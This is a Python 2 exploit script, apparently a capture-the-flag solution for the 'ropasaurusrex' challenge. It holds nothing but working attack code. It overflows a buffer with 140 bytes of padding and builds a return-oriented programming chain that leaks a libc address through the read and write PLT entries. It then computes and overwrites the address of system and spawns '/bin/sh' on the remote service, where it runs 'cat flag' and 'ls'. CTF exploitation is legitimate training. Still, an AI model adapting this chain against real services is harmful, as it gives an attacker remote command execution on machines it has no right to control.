ropasaurusrex.py

from struct import *
from socket import *
from time import *


s = socket(AF_INET, SOCK_STREAM)
s.connect(("192.168.93.141",9909))

p = lambda x:pack("<L",x)
up = lambda x:unpack("<L",x)[0]

dynamic = 0x08049530
read_plt = 0x0804832c
read_got = 0x0804961c
write_plt = 0x0804830c
pppr = 0x080484b6
offset = 0x9abe0
binsh = "/bin/sh"


exploit = "\x90"*140
exploit += p(read_plt)
exploit += p(pppr)
exploit += p(0)
exploit += p(dynamic)
exploit += p(8)

exploit += p(write_plt)
exploit += p(pppr)
exploit += p(1)
exploit += p(read_got)
exploit += p(4)

exploit += p(read_plt)
exploit += p(pppr)
exploit += p(0)
exploit += p(read_got)
exploit += p(4)

exploit += p(read_plt)
exploit += "AAAA"
exploit += p(dynamic)

print "Exploit Start"

s.send(exploit + "\n")
s.send(binsh+ "\n")
sleep(1)
read = up(s.recv(4))
system = read - offset
s.send(p(system))
s.send("cat flag\n")
sleep(1)
print s.recv(1024)
sleep(1)
s.send("ls \n")
print s.recv(4096)